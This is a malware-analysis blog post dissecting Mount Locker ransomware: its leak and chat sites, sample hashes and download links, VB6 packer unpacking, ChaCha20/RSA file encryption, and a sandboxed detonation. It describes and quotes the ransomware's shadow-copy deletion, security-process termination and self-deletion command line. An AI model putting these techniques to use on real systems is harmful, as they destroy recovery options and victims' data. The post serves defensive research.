~Dissecting Malwarehttps://dissectingmalwa.re/2020-12-23T00:00:00+01:00f0wL's Blog about Malware Analysis and Reverse EngineeringBetween a rock and a hard place - Exploring Mount Locker Ransomware2020-12-23T00:00:00+01:002020-12-23T00:00:00+01:00f0wLtag:dissectingmalwa.re,2020-12-23:/between-a-rock-and-a-hard-place-exploring-mount-locker-ransomware.html<p>This time we will be analyzing Mount Locker, a relatively new Ransomware strain that appeard in the second half of 2020. This blog post will detail the initial Analysis, Unpacking and Static + Dynamic Analysis of samples belonging to the second iteration of the Malware.</p><p><br></p>
<p>Hey there, long time no blog post :D It's not like I haven't been doing any research the last couple of months, but between the whole Covid-19 Situation, University work and everything else there was either too little time to finish the posts I started or I came up with multiple smaller things like my <a href="https://github.com/f0wl/configwalker">Netwalker Config Extractor</a> that would not justify a dedicated blog article (I normally dump stuff like this on Twitter instead).</p>
<p><center><img alt="Logo" src="https://dissectingmalwa.re/img/mount-title.jpg"></center></p>
<p><br></p>
<p>Anyway, I wanted to get atleast one more Blogpost out before 2020 comes to an end. This time I will be looking at "Mount Locker", yet another Double Extortion Ransomware (as a Service) that is targeting Microsoft Windows. The goals of this article are:</p>
<ul>
<li>Highlight the Unpacking of the samples</li>
<li>A bit more debugging, something that my older posts lack</li>
<li>A walkthrough of the cryptographic functions</li>
<li>A quality Yara Rule</li>
</ul>
<p><br></p>
<p>Back in September NHS Digital already released an <a href="https://digital.nhs.uk/cyber-alerts/2020/cc-3624">alert</a> for Mount Locker dating its first appearance to July 2020. Although they do not state a delivery method at the moment access through stolen Credentials and Remote Management are very likely. The Advisory also features very solid remediation advice.</p>
<p><br></p>
<p><center><img alt="NHS" src="https://dissectingmalwa.re/img/mount-nhs.png"></center></p>
<p><br></p>
<p><br></p>
<h1><strong>News & Leak Sites</strong></h1>
<p>Since we are talking about Double-Extorition Ransomware here of course Mount Locker runs its own Leak Site. It is available via Tor only and features a Home page, a contact formular and a blog style listing of compromised companies they hit and stole their data.</p>
<p><center><img alt="News" src="https://dissectingmalwa.re/img/mount-news.png"></center></p>
<p><br></p>
<p>Next, let's have a look at how they communicate with their victims. All of the dropped HTML Ransomnotes contain a unique-per-sample onion URL with a live chat. Browsing to this Tor site without the Client ID specified like this <em>/?cid=</em> you will end up with the login prompt shown below (victims don't get a password and leaving the input field blank does not work, so this might only work for operators/affiliates?). I went ahead and removed the Client IDs from all screenshots to not lower the bar for people trying to mess with the chat in any way. Same with the additional contact E-Mail addresses that were found in two of the sample Ransomnotes which follow the pattern <em>firstnameLastname[year/integers]@protonmail.com</em>.</p>
<p><br></p>
<p><center><img alt="Login" src="https://dissectingmalwa.re/img/mount-login.png"></center></p>
<p><br></p>
<p>I will include two of the support chat logs as well, because they allow for a few interesting insights into how Mount Locker attacks work. In the Screenshot below you can see a monologue by the Mount Locker Operators. They obviously really like the support the "Tech Support Role" since they open up the conversation with "We are ready to help you. What are your problems?". After over a week with no reply from the victim they try to contact them again by adressing the message directly to an employee (name redacted, classic scare tactic). It's unclear how they got the name, but my guess is they either gained access via Malspam or remote access to the employee's account.</p>
<p><br></p>
<p><center><img alt="Chat 1" src="https://dissectingmalwa.re/img/mount-chat1.png"></center></p>
<p><br></p>
<p>In the second case the conversation went on for much longer. This time the victim more or less confirms that the affected server was compromised through internet-exposed Remote Access. Upon asking for a decryption price they return with a price of 10 BTC. If this is their default price for an individual they likely won't get anywhere with their ransom demands, since BTC is on an all-time high as well. The criminals later discount this price to 5 BTC which is still too much and the victim decides not to pay (good choice).</p>
<p><br></p>
<p><center><img width="75%" height="75%" alt="Chat 2" src="https://dissectingmalwa.re/img/mount-chat2.png"></center></p>
<p><br></p>
<p>Just for fun I took a quick look at their sites code and noticed their 404 page displayed the nginx version in use. Both of the chat portals from Mount Locker Version 2 (we'll come to the specifics later) likely use nginx 1.14.2. Would you like to take a guess when that version was released? How does <a href="https://nginx.org/en/CHANGES-1.14">over 2 years ago (04.12.2018)</a> sound? Their main Leak site does not display a version number, but I guess they really prefer legacy stuff π΄</p>
<p><center><img alt="Ngnix" src="https://dissectingmalwa.re/img/mount-nginx.png"></center></p>
<p><br></p>
<h1><strong>Initial Analysis</strong></h1>
<p><br> </p>
<p>Both of the samples I will be focusing on in this post belong to "Version 2" of Mount Locker, because since the initial Version of the Ransomware turned up in Sandboxes and Analysis platforms, there were some major changes made by the operators of the campaign.</p>
<p><br></p>
<h3><strong>Sample 1</strong></h3>
<div class="highlight"><pre><span></span><span class="n">filename</span><span class="o">:</span> <span class="n">BreakOut</span><span class="o">.</span><span class="na">exe</span><span class="o">,</span> <span class="n">XACQDAPEV</span><span class="o">.</span><span class="na">exe</span>
<span class="n">filesize</span><span class="o">:</span> <span class="mi">200</span><span class="n">KB</span>
<span class="n">sha</span><span class="o">-</span><span class="mi">256</span><span class="o">:</span> <span class="mi">226</span><span class="n">a723ffb4a91d9950a8b266167c5b354ab0db1dc225578494917fe53867ef2</span>
<span class="n">ssdeep</span><span class="o">:</span> <span class="mi">1536</span><span class="o">:</span><span class="n">ssBoz9GFuIdclwKfVPoawSL20mRbg2DrE1mHkrY0f3r6fR0ZzDWR</span><span class="o">+</span><span class="mi">3</span><span class="n">itGSh6ZVvg</span><span class="o">:</span><span class="n">ssS3oifBoaXhDWA4G3eeJaeIbmC00</span>
<span class="n">VT</span> <span class="n">First</span> <span class="n">Submission</span><span class="o">:</span> <span class="mf">11.11</span><span class="o">.</span><span class="mi">2020</span> <span class="mi">15</span><span class="o">:</span><span class="mi">26</span><span class="o">:</span><span class="mi">06</span>
</pre></div>
<p>Download: <a href="https://app.any.run/tasks/5dc7dca9-187c-498e-b557-87490c4723be/">AnyRun</a> | <a href="https://bazaar.abuse.ch/sample/226a723ffb4a91d9950a8b266167c5b354ab0db1dc225578494917fe53867ef2/">Malware Bazaar</a> | <a href="https://www.virustotal.com/gui/file/226a723ffb4a91d9950a8b266167c5b354ab0db1dc225578494917fe53867ef2/detection">VirusTotal</a> | <a href="https://www.hybrid-analysis.com/sample/226a723ffb4a91d9950a8b266167c5b354ab0db1dc225578494917fe53867ef2/5fb753492b71205a9f5af90a">HybridAnalysis</a></p>
<h3><strong>Sample 2</strong></h3>
<div class="highlight"><pre><span></span><span class="n">filename</span><span class="o">:</span> <span class="n">QuantumQuditSimulator</span><span class="o">.</span><span class="na">exe</span>
<span class="n">filesize</span><span class="o">:</span> <span class="mi">532</span><span class="n">KB</span>
<span class="n">sha</span><span class="o">-</span><span class="mi">256</span><span class="o">:</span> <span class="n">e7c277aae66085f1e0c4789fe51cac50e3ea86d79c8a242ffc066ed0b0548037</span>
<span class="n">ssdeep</span><span class="o">:</span> <span class="mi">6144</span><span class="o">:</span><span class="n">Q5fW8eILySdSS4JoHjnJVZJQQIreKsuKu3a2WQe0gz</span><span class="o">+</span><span class="n">Y</span><span class="o">:</span><span class="n">OeILzSS5jnJ</span><span class="o">/</span><span class="n">JTu3zWtqY</span>
<span class="n">VT</span> <span class="n">First</span> <span class="n">Submission</span><span class="o">:</span> <span class="mf">18.11</span><span class="o">.</span><span class="mi">2020</span> <span class="mi">19</span><span class="o">:</span><span class="mi">33</span><span class="o">:</span><span class="mi">26</span>
</pre></div>
<p>Download: <a href="https://app.any.run/tasks/552dc97d-6a27-4f52-8d92-0542b3e5cfc8/">AnyRun</a> | <a href="https://bazaar.abuse.ch/sample/e7c277aae66085f1e0c4789fe51cac50e3ea86d79c8a242ffc066ed0b0548037/">Malware Bazaar</a> | <a href="https://www.virustotal.com/gui/file/e7c277aae66085f1e0c4789fe51cac50e3ea86d79c8a242ffc066ed0b0548037/detection">VirusTotal</a> | HybridAnalysis: unavailable</p>
<p><br></p>
<p>As always we'll start out with a quick look at Detect it easy to see what we are working with. In both cases it detects Virtual Basic 6 yay! Checking the imports to be sure: yep they only Library we see is <em>MSVBVM60.DLL</em>, the Microsoft Virtual Basic Virtual Machine (yo dawg, heard you like virtual things :D). Although the entropy graph didn't directly indicate a packer I doubt that a serious RaaS Group would write Ransomware in VB.6 these days.</p>
<p><center><img alt="Detect it easy, packed" src="https://dissectingmalwa.re/img/mount-die1.png"></center></p>
<p><br></p>
<p>The next step is to check out the Resources with Resource Hacker. Let's start off with one of the embedded String Tables. The marked function names are definetely a red flag and indicate that this is in fact a VB.6 packer.</p>
<p><br></p>
<p><center><img alt="Stringtable" src="https://dissectingmalwa.re/img/mount-stringtable.png"></center></p>
<p><br></p>
<p>The second curious thing is a PE File! But wait, take a closer Look. There is something wrong with the DOS and Rich Header. The "DOS String" should normally read <em>"This programm cannot be run in DOS mode."</em> whereas this one reads <em>"This!prohsam!caolpt be tum gm DOS kndc."</em>. π€ Looks like some of the characters were shifted by one and then a few were skipped. But instead of figuring it out by hand we'll take a look at the code next and unpack it, since this is just a diversion after all.</p>
<p><br></p>
<p><center><img alt="ResourcePE" src="https://dissectingmalwa.re/img/mount-resPE.png"></center></p>
<p><br></p>
<p>Because VB.6 looks absolutely horrendous in IDA or Ghidra we'll have to use a more specialized tool, <a href="https://www.vb-decompiler.org/">VB.Decompiler Pro</a> in this case. Upon opening the samples with it we notice that most of the implemented functions are dead code. This is also apparent when we look into the GUI Designer (see below), because there is a Graphical User Interface that we never get to see upon running it in a Sandbox. Sample 1 seems to be a game called "Break-Out" and Sample 2 is called "Quantum Qudit Simulator", some kind of calculation programm from the National University of Ireland. Of course both of the Developers of the original applications do not have anything to do with Mount Locker Ransomware, because these samples were obviously altered to act as a packer for it. Even after a lot of search engine magic I couldn't find out where they got these programs from, but if you find them anywhere let me know!</p>
<p><br></p>
<p><center><img alt="Backdoored Programs" src="https://dissectingmalwa.re/img/mount-backdooredProgs.png"></center></p>
<p><br></p>
<p>Now let's look at some decompiled VB.6 code! The API declarations below basically reveal what we already saw in the string table in the resources.</p>
<p><br></p>
<p><center><img alt="API" src="https://dissectingmalwa.re/img/mount-api.png"></center></p>
<p><br></p>
<p>I'll try to present the next lines of snuck-in code in a logical order. The first step is to load the PE resource we saw earlier.</p>
<p><br></p>
<p><center><img alt="Resource" src="https://dissectingmalwa.re/img/mount-loadres.png"></center></p>
<p><br></p>
<p>Up next is a long boi call to <em>VirtualAlloc</em> (sorry if the font in the screenshot is a bit small). Also take note of the variable names like <em>var_804C</em> (which sometimes indicates this code was inserted at a later date) and the obfuscation of the arguments to VirtualAlloc.</p>
<p><br></p>
<p><center><img alt="VirtualAllocate" src="https://dissectingmalwa.re/img/mount-virtualalloc.png"></center></p>
<p><br></p>
<p>Last but not least we have a call to <em>VirtualProtect</em> and <em>RtlMoveMemory</em> (renamed to CopyMemory in the API Declarations above), again with the same obfuscation, to change the protection of the allocated Region in memory and moving the payload there. This is as far as we are going to look into this right now though, since this is just supposed to be a quick look into this "backdoored" application and we'll continue by unpacking the Ransomware sample now.</p>
<p><br></p>
<p><center><img alt="VirtualProtect" src="https://dissectingmalwa.re/img/mount-vprot.png"></center></p>
<p><br></p>
<p><br></p>
<h1><strong>Unpacking</strong></h1>
<p>Since I'm pretty lazy and a big fan of <a href="https://www.youtube.com/channel/UC--DwaiMV-jtO-6EvmKOnqg">Open Analysis Live</a> I thought I'd give <a href="https://www.unpac.me/">Unpac.me</a> a chance at this packer first. Unfortunately something went wrong here (I did not expect more than one Child Binary), but that has to be expected since Classifier Issues with VB.6 Code is one of the Challenges that they are still working on.</p>
<p><center><img width="80%" height="80%" alt="Unpacme" src="https://dissectingmalwa.re/img/mount-unpac.png"></center></p>
<p><br></p>
<p>That should not deter us from unpacking it manually though! The easiest and fastest way would be to set a breakpoint on <em>CreateProcessInternalW</em> and dump it from there if applicable.</p>
<p><center><iframe width="560" height="315" src="https://www.youtube-nocookie.com/embed/DIH4SvKuktM" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></center>
<br></p>
<p>Again, sadly this does not what we want here. Apparently this sample utilizes Self-Injection, so the call to <em>CreateProcessInternalW</em> won't take us to the unpacked Child Process but rather a Powershell script. This seems to be part of the actual Ransomware rather than the packer, so we are too far in already.</p>
<p><br></p>
<p><center><img alt="CreateProcessInternalW" src="https://dissectingmalwa.re/img/mount-cpi.png"></center></p>
<p><br></p>
<p>I'll have to do it the old fashioned way then. One Breakpoint on <em>VirtualProtect</em> and one on the Return from <em>VirtualAlloc</em>. For good luck I'll also throw in one on <em>IsDebuggerPresent</em>.</p>
<p><br></p>
<p><center><img alt="Breakpoints" src="https://dissectingmalwa.re/img/mount-breakpoints.png"></center></p>
<p><br></p>
<p>Turns out altering the return value of <em>IsDebuggerPresent</em> is not necessary for Sample 1, it just unpacks the child regardless. Sample 2 on the other hand will throw an error message and terminate.</p>
<p><br></p>
<p><center><img alt="DebuggerPresent" src="https://dissectingmalwa.re/img/mount-debuggerpresent.png"></center></p>
<p><br></p>
<p>The disadvantage of breaking on <em>VirtualProtect</em> or <em>VirtualAlloc</em> in the case of VB.6 is that the Microsoft Visual Basic Virtual Machine calls both of them multiple times in the setup process. Instead of "Following in Dump" every time we hit a breakpoint it is far easier to just look for the jump to the unpacked PE. The fastest way to get you there is placing a breakpoint on <em>VirtualFree</em> which (atleast in case of these two samples) is called right before the function call that jumps into said Ransomware PE. Once you are there, step into the function and follow the address in <em>jmp ecx</em> to find the unpacked sample. Below I also included a screenshot (green border, blue/white font) of the packed sample in a hex-editor to show that the binaries actually differ.</p>
<p><br></p>
<p><center><img alt="Bin" src="https://dissectingmalwa.re/img/mount-bin.png"></center></p>
<p><br></p>
<p>A quick look at the memory map before we'll dump the segment and go right ahead.</p>
<p><center><img alt="Memory-Map" src="https://dissectingmalwa.re/img/mount-memorymap.png"></center></p>
<p><br></p>
<p>Of course the first thing after dumping the binary for me is to throw it into PE-Bear. Looks like it is still in it's mapped state, so let's continue by unmapping it. (Screenshot: left = mapped, right = unmapped)</p>
<p><center><img alt="Sections" src="https://dissectingmalwa.re/img/mount-sections.png"></center></p>
<p><br></p>
<p>One more thing: Don't forget to adjust the Image Base or your Disassembly/Decompilation results will look like garbage. Ask me how I know π </p>
<p><center><img width="80%" height="80%" alt="Image Base Adjustment" src="https://dissectingmalwa.re/img/mount-imagebase.png"></center></p>
<p><br></p>
<p>Just to verify that we (likely) don't have another packed stage here I'll take a look at it with Detect it Easy. Seems good, let's continue with Static Analysis!</p>
<p><center><img width="80%" height="80%" alt="Detect it easy, unpacked" src="https://dissectingmalwa.re/img/mount-dieUnpacked.png"></center></p>
<p><br></p>
<h1><strong>Static Analysis</strong></h1>
<p><br></p>
<p>First let's check the compiler timestamps on the samples we have. Both x86 binaries contain the same one from <em>November 6th 2020 10:47:05 UTC</em>. Interestingly the x64 Version was (allegedly) copiled just one second earlier.</p>
<p><center><img width="70%" height="70%" alt="Compile Time" src="https://dissectingmalwa.re/img/mount-compiletime.png"></center></p>
<p><br></p>
<p>To make a list of what to expect from this Ransomware I would normally go through the Imports and make some more or less educated guesses what it would do with those functions, but this is again a perfect opportunity to try out a new tool: <strong>capa</strong> by Fireeye. It was released about 6 months ago and it looks like I've been really missing out. As you can see below I made one minor correction after I finished the analysis, but besides that the tool is pretty spot on and will definitely save you some time in triage-like situations.</p>
<p><br></p>
<p><center><img alt="Delete" src="https://dissectingmalwa.re/img/mount-capa.png"></center>
<center><div class="github-card" data-github="fireeye/capa" data-width="400" data-height="" data-theme="default"></div>
<script src="//cdn.jsdelivr.net/github-cards/latest/widget.js"></script></center></p>
<p><br></p>
<p>Because it will be easier to "navigate" the functions of the Ransomware if you know in what context and point in time the log messages are printed I extracted them all. Quite interesting to see this level of verbosity in a Ransomware strain that has been deployed in a few attacks already in the last months. It will become even more apparent in the course of this analysis, but the developers are obviously still trying to figure things out.</p>
<p><br></p>
<p><center><img alt="Logging" src="https://dissectingmalwa.re/img/mount-logging.png"></center></p>
<p><br></p>
<p>Alright, enough π¦-ing around, let's dive in! Ghidra 9.2 is the tool of choice this time around since I wanted the comfort of a decompiler. To start off I took a look at it function-by-function and renamed them to reflect what each one of them does. The following screenshots will show most of the peripheral functions and setup-related things. The Crypto functions will be discussed in a separate chapter. Something to watch out for: there is quite a lot of variable re-use happening in certain functions, so I either renamed the variable to something that would reflect the value it was asigned last or I kept the original name generated by the decompiler to avoid confusion.</p>
<p><br></p>
<p><center><img width="60%" height="60%" alt="Functions" src="https://dissectingmalwa.re/img/mount-functions.png"></center></p>
<p><br></p>
<p>We'll start at the entrypoint. From here the sample branches off into two functions: <em>mw_getArguments</em> will handle, as the name suggests, the arguments given by the operator and <em>mw_mainLockRoutine</em> from where multiple peripheral functions are called.</p>
<p><br></p>
<p><center><img alt="Arguments" src="https://dissectingmalwa.re/img/mount-entry.png"></center></p>
<p><br></p>
<p>Given that the Ransomware sample accepts commandline arguments it speaks for the asumption, that Mount Locker is designed to be manually operated by criminals. The screenshot below depicts the function <em>mw_getArguments</em> that handles the supplied commandline options:</p>
<ul>
<li>/log: --> can be used with 'F' or 'C' to write a Log to a File or Console respectively</li>
<li>/scan: --> valid options: L | N | S, scan attached drives where L = Local Drive, N = Network Drive, S = Network Share</li>
<li>/marker: --> create a specified marker file on each volume to be encrypted</li>
<li>/nodel: --> do not delete the Ransomware binary after execution</li>
</ul>
<p><br></p>
<p><center><img alt="Arguments" src="https://dissectingmalwa.re/img/mount-arguments.png"></center></p>
<p><br></p>
<p>The third function we will take a look at is what I would call the "Main Routine". From here a lot of substantial functions of the Ransomware are called. After allocating the debug console (if the argument flag was set) it will check if a Mutex from another Mount Locker process was already set. Before the actual file encryption functions are called it will delete the Volume Shadow Copies and terminate running processes.</p>
<p><br></p>
<p><center><img alt="Mainroutine" src="https://dissectingmalwa.re/img/mount-mainroutine.png"></center></p>
<p><br></p>
<p><strong>1)</strong> To make sure the Ransomware only runs once on a particular system it will create a Mutex that is derived from the Volume Serialnumber of the System Drive e.g. <em>1AB6AEEA4356D5DDA86ADABB750D5B57</em>. If it fails to retrieve the Serialnumber via <em>GetVolumeInformationW</em> it will default to a Backup value: <em>0x41a207bd</em> which is permuted in the same way. Should <em>CreateMutexW</em> fail and return NULL or System Error 0xb7 (ERROR_ALREADY_EXISTS) the <em>mw_mutex</em> function return <em>false</em>, write an error message to the log and the Ransomware will terminate. Otherwise the function will return <em>true</em> and the execution continues.</p>
<p><br></p>
<p><center><img alt="Mutex" src="https://dissectingmalwa.re/img/mount-mutex.png"></center></p>
<p><br></p>
<p><strong>2)</strong> Up next we have a Powershell script that is written to %temp% (Path via <em>GetTempPath</em>) with the Filename determined via <em>GetTickCount</em> and the extension <em>.tmp</em>. In the next step we'll check what it actually does.
<br></p>
<p><center><img alt="Powershell Function" src="https://dissectingmalwa.re/img/mount-ps1Func.png"></center></p>
<p><br></p>
<p>For decoding and decompressing the Powershell script the most popular tool is of course Cyberchef. Because I like to try out new/alternative tools we'll use Binary Refinery today! It is a great substitute for Cyberchef in Malware Analysis/Triage situations and you can also use it as a Library for your Python projects / tools. And don't forget about the extra street cred for using a CLI tool π As you can see in the screenshot below the first half of the Powershell script is used to delete the Volume Shadow Copies via <em>vssadmin.exe</em> and to stop all services that don't run from the Windows System Directory.</p>
<p><br></p>
<p><center><div class="github-card" data-github="binref/refinery" data-width="400" data-height="" data-theme="default"></div>
<script src="//cdn.jsdelivr.net/github-cards/latest/widget.js"></script></center></p>
<p><center><img alt="Cyberchef" src="https://dissectingmalwa.re/img/mount-binref.png"></center></p>
<p><br></p>
<p>I shortened the process exeption list, but in total it contains 657 filenames of Webbrowsers, System Tools, a lot of Anti-Virus and EDR Clients and even <em>ollydbg.exe</em>, how nice of them! (or maybe they use it internally for debugging? π€). Every process running on the system that does not belong to the Ransomware, run from the Windows directory and is not on the Exception List will be terminated.</p>
<p><center><img alt="Process Kill" src="https://dissectingmalwa.re/img/mount-processKill.png"></center></p>
<p><br></p>
<p><strong>3)</strong> In line with their verbose logging functionality Mount Locker will separate its log output by the volume type of the targeted drive. The interesting "discovery" in this case is that the encryption of Network Shares is not supported yet and therefore Mount Locker won't proceed with file encryption on such volumes.</p>
<p><br></p>
<p><center><img alt="Network Share" src="https://dissectingmalwa.re/img/mount-netLock.png"></center></p>
<p><br></p>
<p>The Log strings in the <em>mw_lockerDirCheck</em> also allow for interesting insights into features into (upcoming) features. For one the are messing around with NTFS Reparse Points which is rarely seen in Malware and log messages like "[OK] locker.dir.check > target_hidden" indicate that they are also trying to attack hidden directories.</p>
<p><br></p>
<p><center><img alt="ClientID" src="https://dissectingmalwa.re/img/mount-dirCheck.png"></center></p>
<p><br></p>
<p>The generation of the ClientID is based on the return of <em>GetComputerName</em> which is used with a 32 character hardcoded string to compute the 64 character long ClientID String found in the Ransomnote.</p>
<p><br></p>
<p><center><img alt="ClientID" src="https://dissectingmalwa.re/img/mount-clientID.png"></center></p>
<p><br></p>
<p>Mount Locker ships with a list of Directory Paths and extensions to be spared from encryption to keep the Operating System ... operational. We'll see in the dynamic Analysis Chapter how well that actually works.</p>
<p><br></p>
<p><center><img width="60%" height="60%" alt="Directories" src="https://dissectingmalwa.re/img/mount-dirs.png"></center></p>
<p><br></p>
<p>To constantly remind the victims of the Ransom and increase psychological pressure Mount Locker registers the Ransomnote to be opened when the user tries to access an encrypted file. The lower screenshot is taken from the Hatching Tria.ge Report for Sample 2 which you can find <a href="https://tria.ge/201121-c152v5zkxx/behavioral1#report">here</a>.</p>
<p><br></p>
<p><center><img alt="Registry" src="https://dissectingmalwa.re/img/mount-shellopen.png"></center></p>
<p><br></p>
<p>The second file that is written to %temp% during the execution of Mount Locker is yet another one with its name derived from the return value of <em>GetTickCount</em>. After the Ransomware finished the encryption routine and if the <em>/nodel</em> flag was not supplied it's time to clean up and Mount Locker will delete itself by invoking e.g. <code>cmd /c "C:\Users\admin\AppData\Local\Temp\\0F7565F4.bat" "C:\Users\admin\Desktop\mountlocker.exe"</code>.</p>
<p><br></p>
<p><center><img alt="BAT File" src="https://dissectingmalwa.re/img/mount-bat.png"></center></p>
<p><br></p>
<p><br></p>
<h1><strong>Cryptographic Functions</strong></h1>
<p><br></p>
<p>Another useful Tool for Ransomware Analysis is PEid with the KANAL plugin. KANAL is short for "Krypto Analyzer" and tries to detect crypto algorithms, functions and constants. In the case of Mount Locker it only recognizes the RSA Public Key import via the WinCrypt API.</p>
<p><center><img height="75%" width="75%"alt="KANAL" src="https://dissectingmalwa.re/img/mount-kanal.png"></center></p>
<p><br></p>
<p>As the function name suggests <em>mw_importPubkey</em> imports the RSA Public Key that is ebedded into the binary. This function also generates the Session Key used with ChaCha20 via <em>__rdtsc</em> + <em>Sleep</em> (more on that later) which is encrypted with the RSA using <em>CryptEncrypt</em>. Once that is done the ClientID will be generated and the Ransomnote is registered to opened with the file extension of the Ransomware.</p>
<p><br></p>
<p><center><img alt="RSA Routine" src="https://dissectingmalwa.re/img/mount-importPubkey.png"></center></p>
<p><br></p>
<p>To take a closer look at the supplied RSA Public Keys I dumped them from both samples with x32dbg.</p>
<p><br></p>
<p><center><img height="85%" width="85%" alt="RSA" src="https://dissectingmalwa.re/img/mount-rsa.png"></center></p>
<p><br></p>
<p>Just as a quick "sanity check": Yes, the Public RSA Keys differ between the samples. Wouldn't be the first time that lazy Ransomware operators reused the same RSA Keypair in multiple samples, so I think it's worth to check atleast.</p>
<p><br></p>
<p><center><img width="70%" height="70%" alt="RSA" src="https://dissectingmalwa.re/img/mount-pubkeys.png"></center></p>
<p><br></p>
<p>In the screenshot below we see the ChaCha20 Block function which is an important component of the Algorithm. It can be identified by the <em>expand 32-byte k</em> magic value.</p>
<p><br></p>
<p><center><img alt="RSA" src="https://dissectingmalwa.re/img/mount-chacha20block.png"></center></p>
<p><br></p>
<p><br></p>
<p>Since the folks at <a href="https://blogs.blackberry.com/en/2020/12/mountlocker-ransomware-as-a-service-offers-double-extortion-capabilities-to-affiliates">Blackberry ThreatVector</a> already spilled the beans, I'll mention it here as well. Instead of using a secure Random Number Generator for the File (and Session) Encryption Keys they opted to use __rdtsc, which returns the processor time stamp (clock cycles since the last reset) without a Sleep call. The Time Stamp Counter is a bad way to generate encryption keys because it is a deterministic function that wraps around every ~49 days and could therefore theoretically be bruteforced (with knowledge about the point in time when <em>__rdtsc</em> was invoked, the Sleep call would be used to "obfuscate" this). This is nothing new though and with the coverage Mount Locker has received up until now I expect this issue to be fixed by the next version.</p>
<p><br></p>
<p><center><img alt="rdtsc" src="https://dissectingmalwa.re/img/mount-rdtsc.png"></center></p>
<p><br></p>
<p>I don't want to throw shade here, but I'm not a fan of detailing Cryptobugs in ongoing Ransomware campaigns. The use of GetTickCount (__rdtsc) isn't a huge flaw in itself, but it could very well come in handy if there were more flaws in the crypto-implementation used. I strongly recommend to watch <a href="https://twitter.com/PolarToffee">@Polartoffee's</a> Talk from Steelcon2019 where this is addressed as well (the video below is timestamped for your convenience):</p>
<p><center><iframe width="560" height="315" src="https://www.youtube-nocookie.com/embed/XoKiBg_l4Wc?start=1383" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></center></p>
<p><br></p>
<p>Fun-fact, speaking of Cryptowall: The File extension list in Mount Locker Version 1 contains about 2600 entries. It made headlines because it also targets Tax Software (which isn't a common thing, but it has been seen before on several occurrences). What I find far more interesting is that they target files previously encrypted by other Ransomware strains as you can see below:</p>
<p><br></p>
<p><center><img alt="Ransomware Extensions" src="https://dissectingmalwa.re/img/mount-cryptext.png"></center></p>
<p><br></p>
<p><em>MapViewOfFile</em> is used to map each file into Memory for encryption. Smaller files are mapped according to their size and if a file is larger than <em>0x40000000</em> it will be mapped in chunks and encrypted. </p>
<p><br></p>
<p><center><img alt="RWrite Keys to File" src="https://dissectingmalwa.re/img/mount-map.png"></center></p>
<p><br></p>
<p>To further investigate the File Encryption I used the classic trick of the bait file filled with null bytes to check for patterns and appended data. As we can see the encrypted file is now 288 bytes longer. They can be divided into 32 bytes for the File Key (which is, as the name suggests, unique for every file) and 256 bytes for the Session Key. Of course these keys are not prepended to the fileheader like that: the File Key is encrypted with the Session Key using ChaCha20 and the Session Key is encrypted with the public RSA Key through <em>CryptEncrypt</em>.</p>
<p><br></p>
<p><center><img alt="Testfile plain" src="https://dissectingmalwa.re/img/mount-test.png"></center>
<center><img alt="Testfile encrypted" src="https://dissectingmalwa.re/img/mount-testfile.png"></center></p>
<p><br></p>
<p>This can be confirmed with Ghidra: Both encrypted keyblobs are prepended to the file with <em>WriteFile</em>.</p>
<p><br></p>
<p><center><img alt="Map File" src="https://dissectingmalwa.re/img/mount-writeKey.png"></center></p>
<p><br></p>
<p>Since most Ransomware groups don't try to reinvent the wheel when it comes to crypto implementations they often get their inspiration from Open Source projects. I looked around Github for a while to find C++ Implementations of ChaCha20 that would fit what we see in Mount Locker. The Repository linked below is just a guess at what they could have used, since this seems to be the oldest ChaCha20 C++ Repo on Github and many Implementations borrow code from it. The structure and compartmentalization into functions also looks very similar. Berstein's reference Implementation for example is constructed differently. I crossreferenced it with <a href="https://tools.ietf.org/html/rfc8439">RFC8439</a> and it looks solid at first glance. Parts of the Quarter Round Mechanism and the Block function are directly copied from the Wikipedia article on Salsa20/ChaCha20 though and the code comments are a bit too sketchy IMO π</p>
<p><br></p>
<p><center><div class="github-card" data-github="983/ChaCha20" data-width="400" data-height="150" data-theme="default"></div>
<script src="//cdn.jsdelivr.net/github-cards/latest/widget.js"></script></center></p>
<p><center><img alt="Github ChaCha20 Implementation" src="https://dissectingmalwa.re/img/mount-chachagithub.png"></center></p>
<p><br></p>
<p><br></p>
<h1><strong>Dynamic Analysis</strong></h1>
<p><br>
Let's first take a look at the Ransomnote. In all investigated versions of Mount Locker it is delivered as a HTML file named <em>RecoveryManual.html</em>. It exhibits a lot of the by now classic scare tactics we know from Ransomware gangs in the Realm of "Don't try to decrypt your files, we are the only ones who can help" and of course the Threat that they would release the stolen data if the Ransom would not be payed in time. Communication with the criminals is to be done through a Webchat via Tor with no Clearnet alternative except for contacting them by E-Mail (accounts registered with Protonmail, which is still the most popular Mail hosting service for Ransomware operators. See <a href="https://track.ransomware.email">ransomware.email</a> for more information).
<br></p>
<p><center><img alt="Ransomnote" src="https://dissectingmalwa.re/img/mount-ransomnote.png"></center></p>
<p><br></p>
<p>During the "Detonation run" I opened Process Monitor for a better Overview of what's going on. Because I didn't want Mount Locker to terminate it, I renamed it to <em>firefox.exe</em> since this process name is on the exception list π As you can see below the Ransomware has four Subprocesses in total: <em>Powershell</em> + <em>vssadmin</em> for process termination and restore point deletion and <em>cmd</em> + <em>attrib</em> for self-deletion.</p>
<p><br></p>
<p><center><img alt="Process Graph" src="https://dissectingmalwa.re/img/mount-procGraph.png"></center></p>
<p><br>
I ran Mount Locker with the <em>/log:F</em> argument to have it log to a file. It created a file on the Desktop named <em>executableName.exe.log</em>, the contents of which can be seen below. The first few lines are related to the deletion of the Volume Shadow Copies. Since Mount Locker currently is not capable of escalating priviledges and I ran the sample without administrative rights the Shadow Copies were left untouched.
<br></p>
<p><center><img alt="Logfile" src="https://dissectingmalwa.re/img/mount-logfile.png"></center></p>
<p><br></p>
<p>Since it is probably one of the most interesting debug features of Mount Locker here is another snippet from the Log File showing the statistics of the System Drive Encryption.</p>
<p><br></p>
<p><center><img alt="Log Stats" src="https://dissectingmalwa.re/img/mount-stats.png"></center></p>
<p><br></p>
<p>And if you would like to know what happens when Mount Locker V2 is run with local admin priviledges, because I already hinted that it doesn't go well: After the machine is rebooted (which some Users do instinctively after a Ransomware infection) Windows will not be able to boot because the <em>bootmgr</em> file was encrypted. I'm not sure if they didn't test this case or they forgot to include it in their exception lists, but the User will certainly not be able to contact them with a (temporarily) bricked machine.</p>
<p><br></p>
<p><center><img alt="Bootmgr" src="https://dissectingmalwa.re/img/mount-bootmgr.png"></center></p>
<p><br></p>
